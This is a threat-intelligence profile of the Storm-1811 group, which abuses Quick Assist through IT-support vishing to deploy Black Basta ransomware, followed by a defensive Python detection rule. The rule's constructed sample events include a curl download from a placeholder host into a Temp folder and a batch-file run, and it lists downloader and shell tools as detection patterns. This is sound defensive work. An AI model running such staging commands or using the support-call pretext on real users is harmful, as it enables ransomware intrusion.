Storm-1811 | |
Date of Initial Activity | April 2024 |
Suspected attribution | Cybercriminal |
Government Affiliation | No |
Motivation | Financial Gain |
Associated tools | Quick Assist |
Overview
Storm-1811 is a financially motivated cybercriminal group tracked for its vishing (voice phishing) campaigns, in which operators phone targets while posing as IT support and talk them through accepting a remote session. The group's recent operations abuse Quick Assist, a legitimate Microsoft remote-assistance application that ships with Windows and lets a helper view and, with the user's consent, control another person's desktop. Because the victim explicitly approves the session and grants control, no exploit is needed: once the operator is driving the desktop, they run commands that download and execute batch files and other tooling, staging the intrusion for a more damaging follow-on attack.
The end goal of Storm-1811's intrusions is the deployment of Black Basta ransomware across the compromised network. Black Basta encrypts files and disrupts operations, and incidents typically end in data loss, downtime and an extortion demand. The tradecraft is notable less for technical novelty than for planning: by relying on social engineering and a trusted, signed Microsoft tool rather than malware exploits, the group sidesteps controls that are tuned to detect malicious binaries rather than misuse of legitimate software.
Common targets
Storm-1811 targets organizations whose users are accustomed to receiving IT help over the phone and whose endpoints have Quick Assist available, which is the default on Windows. The weakness being exploited is procedural rather than a software flaw: an unverified caller is able to talk a user into granting remote control. The sectors below are the kinds of environment where that pattern is most likely to succeed, rather than a confirmed targeting list:
Small to Medium Enterprises (SMEs): organizations with limited security staffing, no allowlisting of remote-access tools, and no formal process for verifying support calls.
Service Providers: IT support companies where remote-access tools such as Quick Assist are used routinely, and whose compromise can yield access to multiple client networks.
Healthcare and Financial Institutions: sectors holding sensitive data, where ransomware causes high-impact disruption and therefore carries strong extortion leverage.
Educational Institutions: schools and universities that rely heavily on remote support for staff and students and often run large, loosely managed endpoint fleets.
Attack Vectors
Vishing (Voice Phishing)
Misuse of Legitimate Remote Support Tools (e.g., Quick Assist)
Social Engineering
File-based Malware (e.g., Trojan Horse WS.Malware.2)
Ransomware Deployment (e.g., Black Basta)
How they operate
Storm-1811's intrusions combine social engineering with hands-on-keyboard activity rather than software exploitation. The operator phones the victim, impersonating internal IT or a help desk, and walks them through opening Quick Assist, entering the operator's session code and, crucially, approving the request for full control. Quick Assist is a legitimate Microsoft tool built for exactly this kind of consented remote troubleshooting, so the session itself looks identical to genuine support; the abuse lies in who is on the other end of the call.
With control of the desktop, the operator works as the logged-on user and runs commands that download scripts and batch files, which in turn retrieve and launch further malicious components. The chain ends with Black Basta ransomware encrypting files on the compromised system and, where the actor has moved laterally, across the wider network, followed by a ransom demand for decryption. Because every step uses a signed Microsoft application and built-in Windows tooling invoked by an interactive user, signature-based defenses see nothing malicious; detection has to focus on the behavior around the session, such as an unexpected Quick Assist launch followed by downloads and script execution from user-writable paths.
What characterizes Storm-1811 is its focus on weaknesses in remote-support process rather than in software, and its willingness to drive each intrusion interactively, with an operator on the phone and at the keyboard throughout. Targets tend to be organizations where remote support is routine, including small and medium enterprises, service providers, and data-sensitive sectors such as healthcare and finance. The combination of a convincing pretext and a trusted tool makes these intrusions hard to catch with tooling alone; call-back verification for support requests and restrictions on who may run Quick Assist matter as much as endpoint detection.
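The behavioral correlation described above, as an added example that is not code from the original profile or from any vendor: a small hunting rule in Python over Sysmon-style process-creation events. Because the operator drives the victim's desktop through Quick Assist rather than launching anything from it, the follow-on commands are children of explorer.exe or a shell, not of QuickAssist.exe, so the rule correlates on host and time instead of parent process. The host names, account, timestamps, the files.example.net URL and the events themselves are constructed for illustration.

```python
"""Hunt for the Storm-1811 pattern: a Quick Assist launch followed by
download and script execution on the same host within a short window.

Added example, not part of the original profile. Input is a list of
Sysmon Event ID 1 (ProcessCreate) style records; the field names mirror
Sysmon's (UtcTime, Image, ParentImage, CommandLine, User), but every
event below is constructed for illustration.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta
import re

QUICK_ASSIST = "quickassist.exe"  # same basename for the inbox and Store-delivered builds
DOWNLOADERS = {"curl.exe", "certutil.exe", "bitsadmin.exe", "powershell.exe", "pwsh.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
STAGED_EXT = (".bat", ".cmd", ".zip", ".ps1", ".vbs")
USER_WRITABLE = ("\\users\\", "\\programdata\\", "\\temp\\")
URL_RE = re.compile(r'https?://[^\s"]+', re.IGNORECASE)


@dataclass(frozen=True)
class ProcessEvent:
    utc_time: datetime
    host: str
    user: str
    image: str
    parent_image: str
    command_line: str


def image_name(path: str) -> str:
    """Basename of an image path, lower-cased, tolerant of either slash style."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def looks_like_staging(command_line: str) -> bool:
    """A script or archive referenced from a user-writable location."""
    lowered = command_line.lower()
    return any(ext in lowered for ext in STAGED_EXT) and any(d in lowered for d in USER_WRITABLE)


def detect(events, window=timedelta(minutes=30)):
    """Return (rule_name, event) pairs for suspicious activity that follows a
    Quick Assist launch on the same host within `window`.

    Correlation is by host and time, not parent process: Quick Assist only
    relays the helper's keyboard and mouse, so the commands they type are
    children of explorer.exe or a shell, never of QuickAssist.exe.
    """
    findings = []
    quick_assist_starts = {}  # host -> [launch times]
    for ev in sorted(events, key=lambda e: e.utc_time):
        name = image_name(ev.image)
        if name == QUICK_ASSIST:
            quick_assist_starts.setdefault(ev.host, []).append(ev.utc_time)
            continue
        if not any(timedelta(0) <= ev.utc_time - t <= window
                   for t in quick_assist_starts.get(ev.host, [])):
            continue  # no recent Quick Assist session on this host
        if name in DOWNLOADERS and URL_RE.search(ev.command_line):
            findings.append(("download_after_quick_assist", ev))
        elif name in SHELLS and looks_like_staging(ev.command_line):
            findings.append(("staged_script_after_quick_assist", ev))
    return findings


# Constructed sample telemetry: one host where the chain plays out, one host
# where curl runs with no Quick Assist session, and a late event outside the
# correlation window. Hosts, user and URL are hypothetical.
T0 = datetime(2024, 5, 15, 14, 2, 0)
SAMPLE_EVENTS = [
    ProcessEvent(T0, "WS-FIN-07", "CORP\\jdoe",
                 r"C:\Windows\System32\quickassist.exe", r"C:\Windows\explorer.exe",
                 "quickassist.exe"),
    ProcessEvent(T0 + timedelta(minutes=6), "WS-FIN-07", "CORP\\jdoe",
                 r"C:\Windows\System32\curl.exe", r"C:\Windows\System32\cmd.exe",
                 r"curl -o C:\Users\jdoe\AppData\Local\Temp\update.zip https://files.example.net/update.zip"),
    ProcessEvent(T0 + timedelta(minutes=7), "WS-HR-02", "CORP\\asmith",
                 r"C:\Windows\System32\curl.exe", r"C:\Windows\System32\cmd.exe",
                 "curl -sI https://www.example.com/"),
    ProcessEvent(T0 + timedelta(minutes=8), "WS-FIN-07", "CORP\\jdoe",
                 r"C:\Windows\System32\cmd.exe", r"C:\Windows\explorer.exe",
                 r"cmd.exe /c C:\Users\jdoe\AppData\Local\Temp\update.bat"),
    ProcessEvent(T0 + timedelta(minutes=9), "WS-FIN-07", "CORP\\jdoe",
                 r"C:\Windows\System32\notepad.exe", r"C:\Windows\explorer.exe",
                 "notepad.exe"),
    ProcessEvent(T0 + timedelta(hours=2), "WS-FIN-07", "CORP\\jdoe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\explorer.exe",
                 "powershell.exe -c Invoke-WebRequest https://www.example.com/"),
]

if __name__ == "__main__":
    for rule, ev in detect(SAMPLE_EVENTS):
        print(f"{ev.utc_time:%H:%M:%S} {ev.host} {ev.user} {rule}: {ev.command_line}")
```

Run against the sample set, the rule fires twice on WS-FIN-07 (the curl download and the batch file run from the user's Temp folder) and stays silent for the other host and for the PowerShell launch two hours later. In production the same logic maps directly onto an EDR query keyed on device and timestamp; tune the window to your help desk's real session lengths and add an allowlist for accounts that legitimately initiate Quick Assist. Where Quick Assist is not needed at all, the cleaner fix is to remove it: it is an optional Windows capability (App.Support.QuickAssist) that Remove-WindowsCapability can uninstall, and the Store-delivered build can be blocked with AppLocker or WDAC. That hardening note is an operational recommendation added here, not something the profile itself states.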